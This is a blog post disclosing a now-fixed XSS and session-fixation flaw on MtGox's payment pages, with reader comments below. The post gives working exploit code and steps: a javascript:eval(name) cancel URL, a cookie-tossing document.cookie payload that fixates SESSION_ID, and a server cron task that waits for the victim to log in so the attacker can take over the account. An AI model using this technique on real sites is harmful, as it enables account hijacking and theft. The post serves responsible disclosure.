But it *is* MtGox. When I started checking bitcoin-related websites it was my target #1. First XSS was found in 5 minutes on payments.mtgox.com, few mins later I discovered session fixation leading to account takeover. Long story short, here's exploit:
name='document.cookie="SESSION_ID=SID; Domain=.mtgox.com; Path=/code"';
location='https://payment.mtgox.com/38131846-a564-487c-abfb-6c5be47bce27/e6325160-7d49-4a69-b40f-42bb3d2f7b91?payment[cancel]=cancel';
1. Create Checkout button https://www.mtgox.com/merchant/checkout and set Cancel URL to javascript:eval(name);
2. Put your payload in window.name and redirect to "https://payment.mtgox.com/38131846-a564-487c-abfb-6c5be47bce27/e6325160-7d49-4a69-b40f-42bb3d2f7b91?payment[cancel]=cancel" (GET-accessible action). MtGox has X-Frame-Options so it won't work in iframe.
3. User is supposed to wait 5 seconds until setTimeout in JS assigns location to our javascript: URL.
4. Get some guest SID with server side and fixate it using this XSS. It's called Cookie tossing, and our cookie shadows original SESSION_ID because more specific Path-s are sent first.
document.cookie="SESSION_ID=SID; Domain=.mtgox.com; Path=/code"
5. Close the window.
6. Someday user logs in, and his session will stay the same SID. Your server script should run cron task every 5 minutes, checking if SID is still "guest". As soon as user signs in you can use fixated SID to perform any actions on behalf of his account - "Session riding".
Timeline
Jan 11 - vuln reported
Jan 14 - vuln accepted and fixed in 3 hours.
FYI use nils@tibanne.com as "security@mtgox.com" (MtGox doesn't have neither bounty program nor email for reports).
Recap:
Even top-notch bitcoin websites are not as secure as payment providers should be. This vulnerability is really easy to find, so I suspect it's been used in the wild. Use 2 factor auth.
In no time bitcoin currency got some good value, but security level of bitcoin websites didn't play along.
Even top-notch bitcoin websites are not as secure as payment providers should be. This vulnerability is really easy to find, so I suspect it's been used in the wild. Use 2 factor auth.
In no time bitcoin currency got some good value, but security level of bitcoin websites didn't play along.
Thank you for helping the community. I hope you got a reward/bounty?
ReplyDeleteHe probably didn’t :(
ReplyDeleteMight be worth putting a bitcoin address on this blog post and accepting donations - I bet more than a few people would throw you some beer money just as a thankyou.
ReplyDeleteYou can use the Dogecoin twitter bot to tip him @homakov. Convert BTC to DOGE and use the instructions here: https://twitter.com/tipdoge
DeleteOr just use tippercoin.com?
DeleteWas this due to the cookies not being set as http only on mtgox?
ReplyDeleteno, current cookies don't matter, i *replaced* them with my value = fixated
DeleteHey Egor, good post. Maybe the main reason I go to Hacker News is to find blogs of experts who are also good writers, inventive and with some panache to add to my top shelf rss pile. Yours is now among them. Keep it up please.
ReplyDelete"Top notch" sites like Gox. Lol
ReplyDeletetop shelf sites, man, top tier
Deleteyou don't get more top than the "Magic: The Gathering Oonline" eXchange
This mainly happened because of XSS vulnerability that allowed you to execute scripts - also because MTGOX at that time allowed session id to get fixated on server side from client side. Ain't?
ReplyDelete